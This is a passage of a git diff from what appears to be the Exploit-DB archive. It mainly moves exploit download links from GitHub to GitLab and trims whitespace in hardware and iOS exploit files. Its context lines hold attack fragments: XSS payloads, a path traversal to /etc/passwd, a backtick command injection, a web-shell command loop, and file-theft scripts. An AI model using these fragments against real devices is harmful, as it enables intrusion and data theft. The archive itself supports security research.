-https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8269.zip (2009-Louhi_CMC-brute_090323.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8269.zip (2009-Louhi_CMC-brute_090323.zip) Other information: diff --git a/exploits/hardware/webapps/11101.txt b/exploits/hardware/webapps/11101.txt index f91b75a9a..11afce4be 100644 --- a/exploits/hardware/webapps/11101.txt +++ b/exploits/hardware/webapps/11101.txt @@ -16,4 +16,4 @@ firmware versions have been confirmed to date: Detailed description available here: http://www.sourcesec.com/Lab/dlink_hnap_captcha.pdf -POC code available here: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11101.tar.gz (hnap0wn.tar.gz) \ No newline at end of file +POC code available here: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11101.tar.gz (hnap0wn.tar.gz) \ No newline at end of file diff --git a/exploits/hardware/webapps/12092.txt b/exploits/hardware/webapps/12092.txt index 0f520be84..a3cbc7c7a 100644 --- a/exploits/hardware/webapps/12092.txt +++ b/exploits/hardware/webapps/12092.txt @@ -17,4 +17,4 @@ because the application fails to sanitize user-supplied input. The vulnerabiliti logged-in user. Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12092.pdf (cybsec_advisory_2010_0402.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12092.pdf (cybsec_advisory_2010_0402.pdf) \ No newline at end of file diff --git a/exploits/hardware/webapps/29959.txt b/exploits/hardware/webapps/29959.txt index 6deb3ff6f..133cff8ba 100644 --- a/exploits/hardware/webapps/29959.txt +++ b/exploits/hardware/webapps/29959.txt @@ -44,4 +44,4 @@ http://alguienenlafisi.blogspot.com Root-Node -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29959.nse \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29959.nse \ No newline at end of file diff --git a/exploits/hardware/webapps/31088.py b/exploits/hardware/webapps/31088.py index a05290898..06a7ef298 100755 --- a/exploits/hardware/webapps/31088.py +++ b/exploits/hardware/webapps/31088.py @@ -52,7 +52,4 @@ def main(): print "[-] Use:bluecomRT.py <ip> <password>" if __name__ == '__main__': - main() - - - + main() \ No newline at end of file diff --git a/exploits/hardware/webapps/32237.txt b/exploits/hardware/webapps/32237.txt index 2a3813b29..bea22b099 100644 --- a/exploits/hardware/webapps/32237.txt +++ b/exploits/hardware/webapps/32237.txt @@ -49,5 +49,4 @@ onclick=prompt(1)>XSS</button> # # More information can be found at: -http://www.nerdbox.it/ubee-evw3200-multiple-vulnerabilities/ - +http://www.nerdbox.it/ubee-evw3200-multiple-vulnerabilities/ \ No newline at end of file diff --git a/exploits/hardware/webapps/32883.txt b/exploits/hardware/webapps/32883.txt index b57325cd5..cc5a620a1 100644 --- a/exploits/hardware/webapps/32883.txt +++ b/exploits/hardware/webapps/32883.txt @@ -95,10 +95,4 @@ wndr3400: 10198 for wndr3400 -****************************************************************************************************************************** - - - - - - +****************************************************************************************************************************** \ No newline at end of file diff --git a/exploits/hardware/webapps/33138.txt b/exploits/hardware/webapps/33138.txt index 45f0136fa..7be89eba5 100644 --- a/exploits/hardware/webapps/33138.txt +++ b/exploits/hardware/webapps/33138.txt @@ -38,5 +38,4 @@ Steps to reproduce / PoC: 5. in "QoS Policy for: " Enter the following: <script>alert("XSS")</script> and click apply. 6. go to another page and navigate back into QoS - the XSS error pops up. - - PoC Video: https://www.youtube.com/watch?v=xxjluF2RR70 - + - PoC Video: https://www.youtube.com/watch?v=xxjluF2RR70 \ No newline at end of file diff --git a/exploits/hardware/webapps/34254.txt b/exploits/hardware/webapps/34254.txt index a061f38aa..76164f8c4 100644 --- a/exploits/hardware/webapps/34254.txt +++ b/exploits/hardware/webapps/34254.txt @@ -7,7 +7,7 @@ # Tested on: TP-Link TL-WR740N v4 Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34254.7z (Password: TP-P0wned-Link) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34254.7z (Password: TP-P0wned-Link) Vulnerability description: The domain name parameters of the "Parental Control" and "Access diff --git a/exploits/hardware/webapps/35933.txt b/exploits/hardware/webapps/35933.txt index 6a12d3915..e980ca0f3 100644 --- a/exploits/hardware/webapps/35933.txt +++ b/exploits/hardware/webapps/35933.txt @@ -47,5 +47,4 @@ http://127.0.0.1/fw/index2.do?completeData=true&url=importedLogDetails" onmouseo Sobhan system Co. Signal Network And Security Group (www.signal-net.net) -E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net - +E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net \ No newline at end of file diff --git a/exploits/hardware/webapps/38004.txt b/exploits/hardware/webapps/38004.txt index f4e541a43..5e17b0934 100644 --- a/exploits/hardware/webapps/38004.txt +++ b/exploits/hardware/webapps/38004.txt @@ -90,6 +90,4 @@ http://downloadcenter.samsung.com/content/FM/201508/20150825112233867/SCX583 Shad Malloy -Secure Network Management, LLC - - +Secure Network Management, LLC \ No newline at end of file diff --git a/exploits/hardware/webapps/38369.txt b/exploits/hardware/webapps/38369.txt index 7939c3fc3..2c3a1ab62 100644 --- a/exploits/hardware/webapps/38369.txt +++ b/exploits/hardware/webapps/38369.txt @@ -96,4 +96,4 @@ Set-Cookie: HcsoB=60cd4a687de94857; path=/; <cltid>0x478e</cltid><sessionid>0x00000000</sessionid><auth>1</auth><protocol>TCP</protocol> <result> <err>0x40</err> </result> -</rcp> +</rcp> \ No newline at end of file diff --git a/exploits/hardware/webapps/38514.py b/exploits/hardware/webapps/38514.py index 87cb3dae5..78d9d82ef 100755 --- a/exploits/hardware/webapps/38514.py +++ b/exploits/hardware/webapps/38514.py @@ -211,4 +211,4 @@ else: else: print 'Please choose a sensible input next time, exiting.' input('Press Enter to continue...') - sys.exit() + sys.exit() \ No newline at end of file diff --git a/exploits/hardware/webapps/39716.py b/exploits/hardware/webapps/39716.py index d4ace98fc..a9d725fab 100755 --- a/exploits/hardware/webapps/39716.py +++ b/exploits/hardware/webapps/39716.py @@ -220,4 +220,4 @@ while(1): if cmd.strip() != "quit" : sendcmd(cmd) else : - sys.exit() + sys.exit() \ No newline at end of file diff --git a/exploits/hardware/webapps/40276.txt b/exploits/hardware/webapps/40276.txt index aa8923be8..47cc7f45d 100644 --- a/exploits/hardware/webapps/40276.txt +++ b/exploits/hardware/webapps/40276.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40276.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40276.zip \ No newline at end of file diff --git a/exploits/hardware/webapps/40690.txt b/exploits/hardware/webapps/40690.txt index e5e5fbab5..eb3e05b01 100644 --- a/exploits/hardware/webapps/40690.txt +++ b/exploits/hardware/webapps/40690.txt @@ -81,4 +81,4 @@ Have had no further contact with them, unable to get a CVE assigned for this, pr Full Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40690.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40690.zip \ No newline at end of file diff --git a/exploits/hardware/webapps/41829.txt b/exploits/hardware/webapps/41829.txt index fd5e27f58..f4609a934 100644 --- a/exploits/hardware/webapps/41829.txt +++ b/exploits/hardware/webapps/41829.txt @@ -114,4 +114,4 @@ DISCLAIMER INFO All content of this advisory is Copyright (C) 2017 Bitcrack Cyber Security, and are licensed under a Creative Commons Attribution Non-Commercial 3.0 (South Africa) License: http://za.creativecommons.org/ and other countries as and when -stipulated. +stipulated. \ No newline at end of file diff --git a/exploits/hardware/webapps/42547.py b/exploits/hardware/webapps/42547.py index 0c708984e..5ad1e8d44 100755 --- a/exploits/hardware/webapps/42547.py +++ b/exploits/hardware/webapps/42547.py @@ -61,4 +61,4 @@ fd = raw_input('[+] File or Directory: aka /etc/passwd and etc..\n') print "Exploiting....." print '\n' URL = "http://" + ip_add + "/cgi-bin/webproc?getpage=/" + fd + "&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard" -print urllib2.urlopen(URL).read() +print urllib2.urlopen(URL).read() \ No newline at end of file diff --git a/exploits/hardware/webapps/42588.txt b/exploits/hardware/webapps/42588.txt index 02461cbd6..fc16fd413 100644 --- a/exploits/hardware/webapps/42588.txt +++ b/exploits/hardware/webapps/42588.txt @@ -114,4 +114,4 @@ User3.privilege=2 The vendor has been contacted and the firmware was updated. See disclosure in: -https://www.brickcom.com/news/productCERT_security_advisorie.php +https://www.brickcom.com/news/productCERT_security_advisorie.php \ No newline at end of file diff --git a/exploits/hardware/webapps/42608.txt b/exploits/hardware/webapps/42608.txt index 524d999be..6f9cc10ea 100644 --- a/exploits/hardware/webapps/42608.txt +++ b/exploits/hardware/webapps/42608.txt @@ -30,4 +30,4 @@ sys_UserName=admin; expires=Mon, 31-Jan-2112 16:00:00 GMT; language=en_us" 29/4/2017 – Vulnerability Discovered. 29/4/2017 - Vendor not responding. -03/09/2017 – Exploit published. +03/09/2017 – Exploit published. \ No newline at end of file diff --git a/exploits/hardware/webapps/42633.txt b/exploits/hardware/webapps/42633.txt index 67d97ef34..cc7a2a86c 100644 --- a/exploits/hardware/webapps/42633.txt +++ b/exploits/hardware/webapps/42633.txt @@ -34,4 +34,4 @@ rawFile.onreadystatechange = function() { }; rawFile.open("GET", "http://10.0.0.1/userRpm/WlanSecurityRpm.htm", true); //pega a source da página /popupSiteSurveyRpm.htm -rawFile.send(); +rawFile.send(); \ No newline at end of file diff --git a/exploits/hardware/webapps/42634.txt b/exploits/hardware/webapps/42634.txt index eb0af214c..a01ac5763 100644 --- a/exploits/hardware/webapps/42634.txt +++ b/exploits/hardware/webapps/42634.txt @@ -20,4 +20,4 @@ http://192.168.1.1/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd https://www.linkedin.com/in/ahmet-mersin-177398b0/ -@gaissecurity +@gaissecurity \ No newline at end of file diff --git a/exploits/hardware/webapps/42649.txt b/exploits/hardware/webapps/42649.txt index 611f6d0c8..2d1c88b4f 100644 --- a/exploits/hardware/webapps/42649.txt +++ b/exploits/hardware/webapps/42649.txt @@ -132,4 +132,4 @@ match your new configuration. Credits: ======= -Ibad Shah, Taimooor Zafar, Owais Mehtab +Ibad Shah, Taimooor Zafar, Owais Mehtab \ No newline at end of file diff --git a/exploits/hardware/webapps/42732.py b/exploits/hardware/webapps/42732.py index 913229dbb..794687616 100755 --- a/exploits/hardware/webapps/42732.py +++ b/exploits/hardware/webapps/42732.py @@ -53,4 +53,4 @@ def main(): if __name__ == '__main__': - main() + main() \ No newline at end of file diff --git a/exploits/hardware/webapps/42785.sh b/exploits/hardware/webapps/42785.sh index 2d5f70f83..64b602af9 100755 --- a/exploits/hardware/webapps/42785.sh +++ b/exploits/hardware/webapps/42785.sh @@ -98,4 +98,4 @@ while true; do echo -ne "\\033[00m"; shell="http://$ip:$port/maintenance/test.php?c=${cmd// /+}" curl "$shell" -done +done \ No newline at end of file diff --git a/exploits/hardware/webapps/42786.txt b/exploits/hardware/webapps/42786.txt index 97f079666..655f55814 100644 --- a/exploits/hardware/webapps/42786.txt +++ b/exploits/hardware/webapps/42786.txt @@ -370,4 +370,4 @@ Product info: http://TARGET/api/system/config/product -{"product":{"name":"generic","sensors":[{"type":"optronic","max":1,"devices":[{"type":"video","text":{"default":"Video"},"max":4,"drivers":["uFLIRish Bullet Video","uFLIRish Bullet Video Snap","uFLIRish Bullet Video Web"]},{"type":"interface","text":{"default":"VMS Remote"},"max":3,"drivers":["Nexus CGI Interface","ONVIF v2.0","Lenel Interface"]},{"type":"ir","text":{"default":"IR"},"max":1,"drivers":["FLIR Tau v2.x","FLIR Radiometric Tau"]},{"type":"plat","text":{"default":"Pan & Tilt"},"max":1,"drivers":["Fixed Mount P&T"]},{"type":"io","text":{"default":"GPIO"},"max":1,"drivers":["Linux GPIO File Handle"]},{"type":"osd","text":{"default":"OSD"},"max":1,"drivers":["OSD uFLIRish"]},{"type":"alarm_manager","text":{"default":"Alarm Manager"},"max":1,"drivers":["Alarm Manager v3.0"]},{"type":"geo","text":{"default":"Georeference"},"max":1,"drivers":["Georeference"]}]}],"maxSensors":1,"maxDevices":255,"ports":[{"id":"\/dev\/ttyp0","text":{"default":"VIPE Video"}},{"id":"\/dev\/ttyS1","text":{"default":"CAM"}}],"aseriesfirmware":false,"mcufirmware":false,"sffc":false,"rescueMode":false},"sections":[{"type":"networking","text":{"default":"Networking"}}]} +{"product":{"name":"generic","sensors":[{"type":"optronic","max":1,"devices":[{"type":"video","text":{"default":"Video"},"max":4,"drivers":["uFLIRish Bullet Video","uFLIRish Bullet Video Snap","uFLIRish Bullet Video Web"]},{"type":"interface","text":{"default":"VMS Remote"},"max":3,"drivers":["Nexus CGI Interface","ONVIF v2.0","Lenel Interface"]},{"type":"ir","text":{"default":"IR"},"max":1,"drivers":["FLIR Tau v2.x","FLIR Radiometric Tau"]},{"type":"plat","text":{"default":"Pan & Tilt"},"max":1,"drivers":["Fixed Mount P&T"]},{"type":"io","text":{"default":"GPIO"},"max":1,"drivers":["Linux GPIO File Handle"]},{"type":"osd","text":{"default":"OSD"},"max":1,"drivers":["OSD uFLIRish"]},{"type":"alarm_manager","text":{"default":"Alarm Manager"},"max":1,"drivers":["Alarm Manager v3.0"]},{"type":"geo","text":{"default":"Georeference"},"max":1,"drivers":["Georeference"]}]}],"maxSensors":1,"maxDevices":255,"ports":[{"id":"\/dev\/ttyp0","text":{"default":"VIPE Video"}},{"id":"\/dev\/ttyS1","text":{"default":"CAM"}}],"aseriesfirmware":false,"mcufirmware":false,"sffc":false,"rescueMode":false},"sections":[{"type":"networking","text":{"default":"Networking"}}]} \ No newline at end of file diff --git a/exploits/hardware/webapps/42788.txt b/exploits/hardware/webapps/42788.txt index 8695707ac..395b70731 100644 --- a/exploits/hardware/webapps/42788.txt +++ b/exploits/hardware/webapps/42788.txt @@ -57,4 +57,4 @@ Accept-Language: en-US,en;q=0.8,mk;q=0.6 Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b Connection: close -dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60sleep%2017%60 +dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60sleep%2017%60 \ No newline at end of file diff --git a/exploits/hardware/webapps/42789.txt b/exploits/hardware/webapps/42789.txt index da6194e64..aeabf5f9e 100644 --- a/exploits/hardware/webapps/42789.txt +++ b/exploits/hardware/webapps/42789.txt @@ -48,4 +48,4 @@ Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5435.php PoC: http://TARGET:8081/graphics/livevideo/stream/stream3.jpg -http://TARGET:8081/graphics/livevideo/stream/stream1.jpg +http://TARGET:8081/graphics/livevideo/stream/stream1.jpg \ No newline at end of file diff --git a/exploits/hardware/webapps/42916.py b/exploits/hardware/webapps/42916.py index 5afffc4c7..7dbd67da4 100755 --- a/exploits/hardware/webapps/42916.py +++ b/exploits/hardware/webapps/42916.py @@ -28,4 +28,4 @@ url = "http://10.0.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg" header = {'Cookie': 'admin:language=pt'} #setando o cookie no header r = get(url, headers=header).text -print(r) +print(r) \ No newline at end of file diff --git a/exploits/hardware/webapps/42931.txt b/exploits/hardware/webapps/42931.txt index d2d28cea7..022d8a1c9 100644 --- a/exploits/hardware/webapps/42931.txt +++ b/exploits/hardware/webapps/42931.txt @@ -23,4 +23,4 @@ words). And go url: http://dvr-domain.dynns.com:XX/doc/page/main.asp. It will Authentication Bypass 3. Solution: -Update to Firmware version V3.0.0 build20170925 +Update to Firmware version V3.0.0 build20170925 \ No newline at end of file diff --git a/exploits/hardware/webapps/42947.txt b/exploits/hardware/webapps/42947.txt index deb496efb..7ecbf2d5e 100644 --- a/exploits/hardware/webapps/42947.txt +++ b/exploits/hardware/webapps/42947.txt @@ -35,4 +35,4 @@ PING 127.0.0.1 (127.0.0.1): 56 data bytes 5 packets transmitted, 5 packets received, 0% packet loss round-trip min/avg/max = 0.214/0.304/0.617 ms root -uid=0(root) gid=0 groups=0 +uid=0(root) gid=0 groups=0 \ No newline at end of file diff --git a/exploits/hardware/webapps/42986.txt b/exploits/hardware/webapps/42986.txt index cd07fa252..0d3848b4e 100644 --- a/exploits/hardware/webapps/42986.txt +++ b/exploits/hardware/webapps/42986.txt @@ -19,7 +19,4 @@ PoC: - Then put the script (<script>alert(1)</script>) -- Xss Vulnerability - - - +- Xss Vulnerability \ No newline at end of file diff --git a/exploits/hardware/webapps/44864.py b/exploits/hardware/webapps/44864.py index 38274c202..bb2231ba5 100755 --- a/exploits/hardware/webapps/44864.py +++ b/exploits/hardware/webapps/44864.py @@ -29,4 +29,4 @@ s.send('POST /login.htm HTTP/1.1\r\n') s.send('command=login&username=' + payload + '&password=PoC\r\n\r\n') s.recv(1024) s.close() -print "\nExploit complete!" +print "\nExploit complete!" \ No newline at end of file diff --git a/exploits/hardware/webapps/45526.txt b/exploits/hardware/webapps/45526.txt index eb159e3d6..f705e7a90 100644 --- a/exploits/hardware/webapps/45526.txt +++ b/exploits/hardware/webapps/45526.txt @@ -28,4 +28,4 @@ Content-Length: 209 Cookie: risessionid=125831398474617; cookieOnOffChecker=on; wimsesid=911065987 Connection: close -mode=ADDUSER&step=BASE&wimToken=847703007&entryIndexIn=00002&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryReadNameIn=&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1 +mode=ADDUSER&step=BASE&wimToken=847703007&entryIndexIn=00002&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryReadNameIn=&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1 \ No newline at end of file diff --git a/exploits/hardware/webapps/46263.txt b/exploits/hardware/webapps/46263.txt index 8b48f19a0..15c07013f 100644 --- a/exploits/hardware/webapps/46263.txt +++ b/exploits/hardware/webapps/46263.txt @@ -27,4 +27,4 @@ Upgrade to version 6.3.0 For more information about fixed software releases, consult the Cisco bug ID CSCvk30983<https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvk30983> 4. Reference: -https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-frpwr-mc-xss +https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-frpwr-mc-xss \ No newline at end of file diff --git a/exploits/hardware/webapps/47893.js b/exploits/hardware/webapps/47893.js index 1bfd9db7d..5fd2ea3e8 100644 --- a/exploits/hardware/webapps/47893.js +++ b/exploits/hardware/webapps/47893.js @@ -10,7 +10,7 @@ Obtains addrof/fakeobj and arbitrary read/write primitives. Supports PS4 consoles on 6.XX. May also work on older firmware versions, but I am not sure. Bug was fixed in firmware 7.00. -EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47893.zip +EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47893.zip */ diff --git a/exploits/hardware/webapps/48588.py b/exploits/hardware/webapps/48588.py index c3b7967a0..2c414a945 100755 --- a/exploits/hardware/webapps/48588.py +++ b/exploits/hardware/webapps/48588.py @@ -1,4 +1,4 @@ -# EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48588.zip +# EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48588.zip # # Exploits a pre-authentication memcpy based stack buffer overflow vulnerability # in httpd on several devices and versions: diff --git a/exploits/ios/dos/39359.txt b/exploits/ios/dos/39359.txt index 7d7d546c1..8bf059cdc 100644 --- a/exploits/ios/dos/39359.txt +++ b/exploits/ios/dos/39359.txt @@ -6,4 +6,4 @@ OS X advisory: https://support.apple.com/en-us/HT205731 iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39359.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39359.zip \ No newline at end of file diff --git a/exploits/ios/dos/39360.txt b/exploits/ios/dos/39360.txt index 5ac77b3a1..8a7cccbc7 100644 --- a/exploits/ios/dos/39360.txt +++ b/exploits/ios/dos/39360.txt @@ -7,4 +7,4 @@ iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39360.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39360.zip \ No newline at end of file diff --git a/exploits/ios/dos/39361.txt b/exploits/ios/dos/39361.txt index 233701d8e..9050556dc 100644 --- a/exploits/ios/dos/39361.txt +++ b/exploits/ios/dos/39361.txt @@ -7,4 +7,4 @@ iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39361.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39361.zip \ No newline at end of file diff --git a/exploits/ios/dos/39362.txt b/exploits/ios/dos/39362.txt index 8c78c2819..a0ec4691a 100644 --- a/exploits/ios/dos/39362.txt +++ b/exploits/ios/dos/39362.txt @@ -7,4 +7,4 @@ iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39362.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39362.zip \ No newline at end of file diff --git a/exploits/ios/dos/39363.txt b/exploits/ios/dos/39363.txt index 1af8133a3..0469cd940 100644 --- a/exploits/ios/dos/39363.txt +++ b/exploits/ios/dos/39363.txt @@ -7,4 +7,4 @@ iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39363.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39363.zip \ No newline at end of file diff --git a/exploits/ios/dos/39364.txt b/exploits/ios/dos/39364.txt index 1795794ac..eda975f19 100644 --- a/exploits/ios/dos/39364.txt +++ b/exploits/ios/dos/39364.txt @@ -7,4 +7,4 @@ iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39364.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39364.zip \ No newline at end of file diff --git a/exploits/ios/dos/40906.txt b/exploits/ios/dos/40906.txt index bb865e327..748769a98 100644 --- a/exploits/ios/dos/40906.txt +++ b/exploits/ios/dos/40906.txt @@ -109,7 +109,7 @@ or https://cert.cx/appleios10/expl.html just click on this link by using Safari. EDB Proofs of Concept Mirror: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40906.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40906.zip -------------------------------------------------------------------------------------- 5. Safari and sandbox diff --git a/exploits/ios/dos/42014.txt b/exploits/ios/dos/42014.txt index 359c253fb..050d98633 100644 --- a/exploits/ios/dos/42014.txt +++ b/exploits/ios/dos/42014.txt @@ -131,4 +131,4 @@ localNotification.soundName = UILocalNotificationDefaultSoundName; Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42014.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42014.zip \ No newline at end of file diff --git a/exploits/ios/dos/45649.txt b/exploits/ios/dos/45649.txt index 0454ed266..094bf4a30 100644 --- a/exploits/ios/dos/45649.txt +++ b/exploits/ios/dos/45649.txt @@ -55,4 +55,4 @@ Here's a code snippet from sleh.c with the second level exception handler for un Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45649.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45649.zip \ No newline at end of file diff --git a/exploits/ios/dos/45786.txt b/exploits/ios/dos/45786.txt index 0f400b455..621787234 100644 --- a/exploits/ios/dos/45786.txt +++ b/exploits/ios/dos/45786.txt @@ -11,4 +11,4 @@ The issue can be reproduced using the attached sequence of RTP packets. To repro Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45786.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45786.zip \ No newline at end of file diff --git a/exploits/ios/dos/46913.txt b/exploits/ios/dos/46913.txt index 80c68e215..6ffabe96a 100644 --- a/exploits/ios/dos/46913.txt +++ b/exploits/ios/dos/46913.txt @@ -24,4 +24,4 @@ This issue was fixed on Tuesday, May 14 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46913.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46913.zip \ No newline at end of file diff --git a/exploits/ios/dos/47415.txt b/exploits/ios/dos/47415.txt index ca925862b..415e98fe4 100644 --- a/exploits/ios/dos/47415.txt +++ b/exploits/ios/dos/47415.txt @@ -31,4 +31,4 @@ The NSSharedDictionary initWithCoder implementation is very complex and greatly Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47415.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47415.zip \ No newline at end of file diff --git a/exploits/ios/dos/47694.txt b/exploits/ios/dos/47694.txt index 45e6b219f..7c87622c5 100644 --- a/exploits/ios/dos/47694.txt +++ b/exploits/ios/dos/47694.txt @@ -52,4 +52,4 @@ Tested on iOS 12.4 (16G77) on iPod touch 6G Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47694.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47694.zip \ No newline at end of file diff --git a/exploits/ios/local/14538.txt b/exploits/ios/local/14538.txt index 2ef23bf4c..bbfc43cc4 100644 --- a/exploits/ios/local/14538.txt +++ b/exploits/ios/local/14538.txt @@ -1,3 +1,3 @@ The files contained in the archive link below are those that make use of a pdf exploit in order to jailbreak devices running Apple iOS. These pdf's are of interest in that they originate in userland and give root access to the devices. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14538.7z (ios_pdf_exploit.7z) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14538.7z (ios_pdf_exploit.7z) \ No newline at end of file diff --git a/exploits/ios/local/42555.txt b/exploits/ios/local/42555.txt index 9fdc0be78..da9b168c5 100644 --- a/exploits/ios/local/42555.txt +++ b/exploits/ios/local/42555.txt @@ -35,4 +35,4 @@ Credit for finding the vulnerabilities, chaining them together, writing the expl Proof of Concept: https://github.com/doadam/ziVA -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42555.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42555.zip \ No newline at end of file diff --git a/exploits/ios/remote/28081.txt b/exploits/ios/remote/28081.txt index 8a758e938..1331043d8 100644 --- a/exploits/ios/remote/28081.txt +++ b/exploits/ios/remote/28081.txt @@ -54,7 +54,7 @@ into the JS code). The full exploit code is available here: http://packetstormsecurity.com/files/123088/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28081.tgz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28081.tgz +------------------------------------------------------------------------------+ diff --git a/exploits/ios/remote/34399.txt b/exploits/ios/remote/34399.txt index ac496f041..68f384977 100644 --- a/exploits/ios/remote/34399.txt +++ b/exploits/ios/remote/34399.txt @@ -81,26 +81,4 @@ We can look for all the memos by incrementing the value of "id" -#SaMaN(@samanL33T) - - - - - - - - - - - - - - - - - - - - - - +#SaMaN(@samanL33T) \ No newline at end of file diff --git a/exploits/ios/remote/42784.txt b/exploits/ios/remote/42784.txt index b8809006e..5d1a82a3d 100644 --- a/exploits/ios/remote/42784.txt +++ b/exploits/ios/remote/42784.txt @@ -32,4 +32,4 @@ Following the steps above should result in installation of a simple backdoor all Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42784.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42784.zip \ No newline at end of file diff --git a/exploits/ios/remote/42996.txt b/exploits/ios/remote/42996.txt index 8ddf10236..7f56cdbf3 100644 --- a/exploits/ios/remote/42996.txt +++ b/exploits/ios/remote/42996.txt @@ -33,4 +33,4 @@ Following the steps above should result in DART's descriptor being mapped into I Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42996.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42996.zip \ No newline at end of file diff --git a/exploits/ios/remote/4522.html b/exploits/ios/remote/4522.html index 56f28ec05..6f7078717 